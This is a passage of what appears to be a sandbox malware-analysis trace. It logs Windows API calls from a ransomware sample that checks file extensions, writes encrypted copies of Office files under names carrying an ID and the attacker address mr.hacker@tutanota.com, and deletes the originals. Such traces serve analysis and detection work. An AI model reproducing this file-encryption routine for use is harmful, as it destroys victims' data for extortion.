returned 4 [0274.009] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0274.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58 [0274.009] lstrlenW (lpString=".jpg") returned 4 [0274.009] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1 [0274.009] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0274.009] lstrlenW (lpString="GrooveIntlResource.dll") returned 22 [0274.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveintlresource.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.010] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=8794976) returned 1 [0274.010] CloseHandle (hObject=0x3c0) returned 1 [0274.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveintlresource.dll")) returned 0x20 [0274.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveintlresource.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.010] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveintlresource.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveintlresource.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0274.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70 [0274.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70 [0274.011] lstrlenW (lpString=".doc") returned 4 [0274.011] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0274.011] lstrlenW (lpString=".docx") returned 5 [0274.011] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0274.011] lstrlenW (lpString=".pdf") returned 4 [0274.011] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0274.011] lstrlenW (lpString=".xls") returned 4 [0274.011] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0274.011] lstrlenW (lpString=".xlsx") returned 5 [0274.011] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0274.011] lstrlenW (lpString=".ppt") returned 4 [0274.011] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0274.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70 [0274.011] lstrlenW (lpString=".zip") returned 4 [0274.011] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0274.011] lstrlenW (lpString=".rar") returned 4 [0274.011] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0274.011] lstrlenW (lpString=".bz2") returned 4 [0274.011] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0274.011] lstrlenW (lpString=".7z") returned 3 [0274.011] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0274.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70 [0274.011] lstrlenW (lpString=".dbf") returned 4 [0274.011] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0274.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70 [0274.011] lstrlenW (lpString=".1cd") returned 4 [0274.011] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0274.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70 [0274.011] lstrlenW (lpString=".jpg") returned 4 [0274.011] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0274.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70 [0274.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70 [0274.012] lstrlenW (lpString=".doc") returned 4 [0274.012] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0274.012] lstrlenW (lpString=".docx") returned 5 [0274.012] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0274.012] lstrlenW (lpString=".pdf") returned 4 [0274.012] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0274.012] lstrlenW (lpString=".xls") returned 4 [0274.012] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0274.012] lstrlenW (lpString=".xlsx") returned 5 [0274.012] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0274.012] lstrlenW (lpString=".ppt") returned 4 [0274.012] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0274.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70 [0274.012] lstrlenW (lpString=".zip") returned 4 [0274.012] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0274.012] lstrlenW (lpString=".rar") returned 4 [0274.012] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0274.012] lstrlenW (lpString=".bz2") returned 4 [0274.012] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0274.012] lstrlenW (lpString=".7z") returned 3 [0274.012] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0274.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70 [0274.012] lstrlenW (lpString=".dbf") returned 4 [0274.012] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0274.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70 [0274.012] lstrlenW (lpString=".1cd") returned 4 [0274.012] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0274.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70 [0274.012] lstrlenW (lpString=".jpg") returned 4 [0274.013] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0274.013] lstrcmpiW (lpString1=".HXC", lpString2=".USA") returned -1 [0274.013] lstrlenW (lpString="GROOVE_COL.HXC") returned 14 [0274.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.014] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=626) returned 1 [0274.014] CloseHandle (hObject=0x3c0) returned 1 [0274.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxc")) returned 0x20 [0274.044] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxc.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.047] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.055] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.055] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxc.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.055] GetLastError () returned 0x0 [0274.055] ReadFile (in: hFile=0x3c0, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x272, lpOverlapped=0x0) returned 1 [0274.058] WriteFile (in: hFile=0x2ac, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x280, lpOverlapped=0x0) returned 1 [0274.059] ReadFile (in: hFile=0x3c0, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.059] WriteFile (in: hFile=0x2ac, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0274.059] SetEndOfFile (hFile=0x2ac) returned 1 [0274.059] CloseHandle (hObject=0x2ac) returned 1 [0274.059] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.059] SetEndOfFile (hFile=0x3c0) returned 1 [0274.061] CloseHandle (hObject=0x3c0) returned 1 [0274.061] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.061] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxc")) returned 1 [0274.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62 [0274.061] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62 [0274.061] lstrlenW (lpString=".doc") returned 4 [0274.061] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0274.061] lstrlenW (lpString=".docx") returned 5 [0274.061] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0274.061] lstrlenW (lpString=".pdf") returned 4 [0274.062] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0274.062] lstrlenW (lpString=".xls") returned 4 [0274.062] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0274.062] lstrlenW (lpString=".xlsx") returned 5 [0274.062] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0274.062] lstrlenW (lpString=".ppt") returned 4 [0274.062] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0274.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62 [0274.062] lstrlenW (lpString=".zip") returned 4 [0274.062] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0274.062] lstrlenW (lpString=".rar") returned 4 [0274.062] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0274.062] lstrlenW (lpString=".bz2") returned 4 [0274.062] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0274.062] lstrlenW (lpString=".7z") returned 3 [0274.062] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0274.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62 [0274.062] lstrlenW (lpString=".dbf") returned 4 [0274.062] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0274.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62 [0274.062] lstrlenW (lpString=".1cd") returned 4 [0274.062] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0274.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62 [0274.062] lstrlenW (lpString=".jpg") returned 4 [0274.062] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0274.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62 [0274.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62 [0274.062] lstrlenW (lpString=".doc") returned 4 [0274.062] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0274.062] lstrlenW (lpString=".docx") returned 5 [0274.062] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0274.062] lstrlenW (lpString=".pdf") returned 4 [0274.063] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0274.063] lstrlenW (lpString=".xls") returned 4 [0274.063] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0274.063] lstrlenW (lpString=".xlsx") returned 5 [0274.063] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0274.063] lstrlenW (lpString=".ppt") returned 4 [0274.063] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0274.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62 [0274.063] lstrlenW (lpString=".zip") returned 4 [0274.063] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0274.063] lstrlenW (lpString=".rar") returned 4 [0274.063] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0274.063] lstrlenW (lpString=".bz2") returned 4 [0274.063] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0274.063] lstrlenW (lpString=".7z") returned 3 [0274.063] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0274.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62 [0274.063] lstrlenW (lpString=".dbf") returned 4 [0274.063] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0274.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62 [0274.063] lstrlenW (lpString=".1cd") returned 4 [0274.063] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0274.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62 [0274.063] lstrlenW (lpString=".jpg") returned 4 [0274.063] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0274.063] lstrcmpiW (lpString1=".VRD", lpString2=".USA") returned 1 [0274.063] lstrlenW (lpString="HVACDIFF.VRD") returned 12 [0274.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacdiff.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0274.082] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=1919) returned 1 [0274.090] CloseHandle (hObject=0x380) returned 1 [0274.090] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacdiff.vrd")) returned 0x20 [0274.090] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacdiff.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacdiff.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0274.133] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.133] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacdiff.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.134] GetLastError () returned 0x0 [0274.134] ReadFile (in: hFile=0x380, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x77f, lpOverlapped=0x0) returned 1 [0274.135] WriteFile (in: hFile=0x2ac, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x780, lpOverlapped=0x0) returned 1 [0274.137] ReadFile (in: hFile=0x380, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.137] WriteFile (in: hFile=0x2ac, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.137] SetEndOfFile (hFile=0x2ac) returned 1 [0274.137] CloseHandle (hObject=0x2ac) returned 1 [0274.137] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.137] SetEndOfFile (hFile=0x380) returned 1 [0274.139] CloseHandle (hObject=0x380) returned 1 [0274.139] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.139] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvacdiff.vrd")) returned 1 [0274.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60 [0274.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60 [0274.140] lstrlenW (lpString=".doc") returned 4 [0274.140] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0274.140] lstrlenW (lpString=".docx") returned 5 [0274.140] lstrcmpiW (lpString1=".docx", lpString2="F.VRD") returned -1 [0274.140] lstrlenW (lpString=".pdf") returned 4 [0274.140] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0274.140] lstrlenW (lpString=".xls") returned 4 [0274.140] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0274.140] lstrlenW (lpString=".xlsx") returned 5 [0274.140] lstrcmpiW (lpString1=".xlsx", lpString2="F.VRD") returned -1 [0274.140] lstrlenW (lpString=".ppt") returned 4 [0274.140] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0274.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60 [0274.140] lstrlenW (lpString=".zip") returned 4 [0274.140] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0274.140] lstrlenW (lpString=".rar") returned 4 [0274.140] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0274.140] lstrlenW (lpString=".bz2") returned 4 [0274.140] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0274.140] lstrlenW (lpString=".7z") returned 3 [0274.140] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0274.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60 [0274.140] lstrlenW (lpString=".dbf") returned 4 [0274.140] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0274.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60 [0274.140] lstrlenW (lpString=".1cd") returned 4 [0274.140] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0274.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60 [0274.140] lstrlenW (lpString=".jpg") returned 4 [0274.140] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0274.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60 [0274.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60 [0274.141] lstrlenW (lpString=".doc") returned 4 [0274.141] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0274.141] lstrlenW (lpString=".docx") returned 5 [0274.141] lstrcmpiW (lpString1=".docx", lpString2="F.VRD") returned -1 [0274.141] lstrlenW (lpString=".pdf") returned 4 [0274.141] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0274.141] lstrlenW (lpString=".xls") returned 4 [0274.141] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0274.141] lstrlenW (lpString=".xlsx") returned 5 [0274.141] lstrcmpiW (lpString1=".xlsx", lpString2="F.VRD") returned -1 [0274.141] lstrlenW (lpString=".ppt") returned 4 [0274.141] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0274.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60 [0274.141] lstrlenW (lpString=".zip") returned 4 [0274.141] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0274.141] lstrlenW (lpString=".rar") returned 4 [0274.141] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0274.141] lstrlenW (lpString=".bz2") returned 4 [0274.141] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0274.141] lstrlenW (lpString=".7z") returned 3 [0274.141] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0274.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60 [0274.141] lstrlenW (lpString=".dbf") returned 4 [0274.141] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0274.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60 [0274.141] lstrlenW (lpString=".1cd") returned 4 [0274.141] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0274.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVACDIFF.VRD") returned 60 [0274.141] lstrlenW (lpString=".jpg") returned 4 [0274.141] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0274.142] lstrcmpiW (lpString1=".HXS", lpString2=".USA") returned -1 [0274.142] lstrlenW (lpString="INFOPATHEDITOR.HXS") returned 18 [0274.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0274.142] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=432098) returned 1 [0274.142] CloseHandle (hObject=0x380) returned 1 [0274.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor.hxs")) returned 0x20 [0274.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor.hxs.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0274.142] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.142] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor.hxs.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.143] GetLastError () returned 0x0 [0274.143] ReadFile (in: hFile=0x380, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x697e2, lpOverlapped=0x0) returned 1 [0274.264] WriteFile (in: hFile=0x2ac, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x697f0, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x697f0, lpOverlapped=0x0) returned 1 [0274.271] ReadFile (in: hFile=0x380, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.271] WriteFile (in: hFile=0x2ac, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xf8, lpOverlapped=0x0) returned 1 [0274.271] SetEndOfFile (hFile=0x2ac) returned 1 [0274.272] 